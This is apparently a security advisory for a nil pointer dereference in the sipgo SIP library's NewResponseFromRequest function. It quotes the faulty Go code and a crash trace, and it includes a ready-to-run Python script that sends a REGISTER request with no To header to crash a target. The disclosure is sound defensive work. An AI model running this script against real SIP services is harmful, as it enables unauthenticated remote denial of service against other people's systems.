"details": "### Description\n\nA nil pointer dereference vulnerability was discovered in the SIPGO library's `NewResponseFromRequest` function that affects all normal SIP operations. The vulnerability allows remote attackers to crash any SIP application by sending a single malformed SIP request without a To header.\n\nThe vulnerability occurs when SIP message parsing succeeds for a request missing the To header, but the response creation code assumes the To header exists without a nil check. This affects routine operations like call setup, authentication, and message handling - not just error cases.\n\n> Note: This vulnerability affects all SIP applications using the sipgo library, not just specific configurations or edge cases, as long as they make use of the `NewResponseFromRequest` function.\n\n### Technical details\n\nThe vulnerability is located in `/sip/response.go` at line 242 in the `NewResponseFromRequest` function:\n\n```go\nif _, ok := res.To().Params[\"tag\"]; !ok {\n    uuid, _ := uuid.NewRandom()\n    res.to.Params[\"tag\"] = uuid.String()\n}\n```\n\n**Root Cause:**\n\n1. **Missing To Header**: When any SIP request is sent without a To header, the SIP message parsing succeeds but the To header is never set in the request object.\n\n2. **Header Copying Logic**: During response creation in `NewResponseFromRequest`, the code copies headers from the request to the response. Since there is no To header in the request, no To header is copied to the response.\n\n3. **Unsafe Assumption**: The response creation code assumes the To header exists and calls `res.To().Params[\"tag\"]` without checking whether `res.To()` returns `nil`, causing a nil pointer dereference.\n\n**Stack Trace:**\n```\npanic: runtime error: invalid memory address or nil pointer dereference\n[signal SIGSEGV: segmentation violation code=0x2 addr=0x70 pc=0x10261fcb4]\n\ngoroutine 175 [running]:\ngithub.com/emiago/sipgo/sip.NewResponseFromRequest(0x14000433e00, 0x191, {0x1026b074b, 0xb}, {0x0, 0x0, 0x0})\n\t/Users/user/Documents/GitHub/sipgo/sip/response.go:242 +0x394\n```\n\n### Impact\n\nThis vulnerability affects **all SIP applications using the sipgo library when using `NewResponseFromRequest` to generate SIP responses**.\n\n**Attack Impact:**\n- **Availability**: Complete denial of service - the application crashes immediately\n- **Remote Exploitation**: Yes\n- **Authentication Required**: No - the vulnerability triggers during initial response generation, which does not require authentication\n\n### How to reproduce the issue\n\nTo reproduce this issue, you need:\n\n1. A SIP application using the vulnerable sipgo library\n2. Network access to send SIP messages to the target\n\nSteps:\n\n1. Save the following Python script as `sipgo-response-dos.py`:\n\n   ```python\n   #!/usr/bin/env python3\n   import socket\n   import sys\n   import time\n   import random\n\n   def create_malformed_register(target_ip, target_port):\n       call_id = f\"sipgo-dos-{int(time.time())}\"\n       tag = f\"sipgo-dos-{random.randint(1000, 9999)}\"\n       branch = f\"z9hG4bK-sipgo-dos-{random.randint(10000, 99999)}\"\n\n       # Craft malformed SIP request without To header\n       sip_message = (\n           f\"REGISTER sip:{target_ip}:{target_port} SIP/2.0\\r\\n\"\n           f\"Via: SIP/2.0/UDP 192.168.1.100:5060;rport;branch={branch}\\r\\n\"\n           f\"From: <sip:[email protected]>;tag={tag}\\r\\n\"\n           f\"Call-ID: {call_id}\\r\\n\"\n           f\"CSeq: 1 REGISTER\\r\\n\"\n           f\"Contact: <sip:[email protected]:5060>\\r\\n\"\n           f\"Content-Length: 0\\r\\n\"\n           f\"\\r\\n\"\n       )\n       return sip_message\n\n   if __name__ == \"__main__\":\n       if len(sys.argv) != 3:\n           print(\"Usage: python3 sipgo-response-dos.py <target_ip> <target_port>\")\n           sys.exit(1)\n\n       target_ip = sys.argv[1]\n       target_port = int(sys.argv[2])\n\n       sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n       payload = create_malformed_register(target_ip, target_port)\n\n       print(f\"Sending malformed REGISTER to {target_ip}:{target_port}\")\n       sock.sendto(payload.encode('utf-8'), (target_ip, target_port))\n       print(\"Exploit sent - target should crash immediately\")\n   ```\n\n2. Run the script against a vulnerable sipgo application:\n\n   ```bash\n   python3 sipgo-response-dos.py <target_ip> <target_port>\n   ```\n\n3. Observe that the target application crashes with a SIGSEGV panic.\n\n> Note: The key element is the missing To header in any SIP request, which triggers the nil pointer dereference.",